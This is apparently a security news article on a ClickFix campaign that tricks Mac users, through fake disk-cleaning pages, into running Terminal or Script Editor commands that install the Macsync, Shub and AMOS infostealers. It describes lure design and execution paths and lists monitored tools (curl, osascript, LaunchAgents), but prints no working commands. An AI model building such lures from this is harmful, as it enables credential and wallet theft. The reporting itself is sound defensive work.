Mac users are being targeted by a widening ClickFix campaign that disguises malicious commands as disk-cleaning and system-maintenance advice, turning routine troubleshooting into a route for credential theft, wallet compromise and cloud-data exposure.
The attacks use pages that appear to offer help with storage optimisation, system clean-up or utility installation. Victims are instructed to copy commands into Terminal, or in some variants to trigger Apple’s Script Editor, under the impression that they are reclaiming disk space or installing trusted helper tools. Instead, the commands fetch remote scripts that install infostealers including Macsync, Shub Stealer and Atomic macOS Stealer, known as AMOS.
The shift marks a notable evolution in ClickFix tactics. Earlier campaigns often pushed disk image files that required users to download and install an application manually. The newer activity reduces dependence on traditional malware delivery by persuading the victim to run native macOS tools directly. That approach helps attackers sidestep some familiar warnings because the execution appears to originate from the user’s own action rather than from an unsolicited attachment or conventional exploit.
Once installed, the malware is designed to collect browser credentials, Keychain entries, iCloud data, documents, media files, application tokens and cryptocurrency wallet material. Some variants go further by replacing legitimate wallet applications with trojanised versions or installing persistence mechanisms that allow attackers to return to the machine. The risk is especially acute for developers, finance professionals, cryptocurrency users and employees working across mixed macOS and Windows environments.
The lures have become more polished. Fake clean-up pages imitate Apple-style language and visual cues, while other campaigns have used fake CAPTCHA checks, software repositories, search results and AI-assisted troubleshooting prompts. The common thread is simple: attackers tell users that a short command will fix a problem. The command instead becomes the infection chain.
Security researchers have also identified variants that avoid Terminal altogether. One macOS attack used the applescript URL scheme to open Script Editor from the browser, presenting a pre-filled script that appeared to perform storage optimisation. This tactic matters because Apple has added more friction around commands pasted into Terminal, pushing attackers to test alternative execution paths while keeping the social-engineering pitch intact.
The technique’s effectiveness lies in its low technical barrier. ClickFix does not need a zero-day vulnerability or a complex phishing attachment. It exploits trust in familiar troubleshooting workflows and the perception that macOS remains safer than other operating systems. That perception is increasingly outdated as commercial stealer kits for macOS mature and become easier for criminal groups to deploy.
Macsync and Shub Stealer have shown signs of iterative development, with operators adding evasion, tracking and persistence features. AMOS has already been widely used in campaigns targeting cryptocurrency users, software developers and online-service accounts. The appearance of multiple malware families in similar ClickFix chains suggests that the delivery model is being adopted as a reusable access method rather than a one-off tactic.
The campaign also highlights the role of popular content and hosting platforms in modern malware distribution. Attackers benefit when malicious instructions are placed where users expect technical guidance, whether through cloned help pages, poisoned search results, fake project repositories or pages mimicking verification services. The command may be the payload trigger, but the surrounding page supplies the credibility.
For organisations, the threat complicates user training. Traditional warnings about suspicious attachments and unknown downloads are no longer sufficient when the user is told to run a command as part of a supposed fix. Endpoint monitoring needs to pay closer attention to unusual use of curl, bash, zsh, osascript, AppleScript, LaunchAgents and scripts writing binaries to temporary directories. Network telemetry can also help flag connections to newly registered domains or command-and-control infrastructure after a user visits a troubleshooting page.
Apple’s expanding security controls add friction, but the campaign shows that attackers adapt quickly. Gatekeeper, quarantine flags and paste warnings are useful safeguards, yet they can be weakened when users are coached through the process step by step. The most reliable defence remains a combination of technical controls, browser protection, endpoint detection, least-privilege settings and clear rules against executing copied commands from web pages.
Follow Arabian Post
Select Arabian Post as your preferred source on Google and MSN News for trusted business news and Arab politics and updates.
